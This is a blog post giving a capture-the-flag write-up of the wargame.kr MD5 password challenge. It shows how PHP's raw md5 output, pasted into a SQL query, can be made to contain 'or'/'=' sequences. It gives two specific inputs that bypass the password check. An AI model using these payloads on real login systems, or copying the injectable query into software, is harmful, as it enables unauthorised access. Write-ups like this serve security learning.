Thứ Hai, 9 tháng 12, 2019

[WARGAME.KR] MD5 PASSWORD VULNERABILITY WRITEUP!

THIS CHALL IS TO SUBMIT A PASSWORD WHICH WILL BE SENT TO md5($ps,true) FUNCTION AND THIS MD5 PASSWORD IS A PART OF THIS SQL QUERY :


$row=@mysql_fetch_array(mysql_query("select * from admin_password where password='".md5($ps,true)."'"));
OFCORSE WE DONT HAVE IDEA ABOUT PASSWORD , SO WE MUST FIND A WAY TO BYPASS THIS QUERY BY SQL INJECTION !

FIRST, TAKE A LOOK AT MD5() FUNCTION DEFINITION AND IT'S VULENERABILITY :

 string md5 string $str bool $raw_output = false ] )




THE STRING SUPPLIED AS THE FIRST ARGUMENT IS MD5 HASHED AND RETURNED OUTPUT  32 LENGTH OF HEX FORM . THE DEFAULT OF $raw_output IS FALSE, IF IT = TRUE , THE SUPPLIED STRING WILL BE RETURNED AS 16 BYTES OF BINARY VALUE .

NOW ,WE COME BACK TO THE SQL QUERY


(mysql_query("select * from admin_password where password='".md5($ps,true)."'");
IF WE CAN 'FORCE' THE OUPUT MD5 PASSWORD CONTAINS : 'OR'  or '=' , WE CAN BYPASS THIS QUERY BY SQL INJECTION . THIS QUERY WILL BECOME :


(mysql_query("select * from admin_password where password=''OR''");
 EXAMPLE 'DAD'OR'1=1→ FALSE OR TRUE → TRUE
THIS CASE: 129581926211651571912466741651878684928 IS THE PASSWORD SHOULD BE SENT TO MD5 FUNCTION
 or


(mysql_query("select * from admin_password where password=''=''");
'DAD'='SDSD→ FALSE = FALSE → TRUE 

THIS CASE : 9235566 IS THE PASSWORD SHOULD BE SENT TO MD5 FUNCTION  



SO , IN 2 CASES , THE PASSWORD OUTPUT WILL BE TRUE IN THE QUERY AND THE QUERY EXECUTED !




HAPPY HACKING!






















Phổ Biến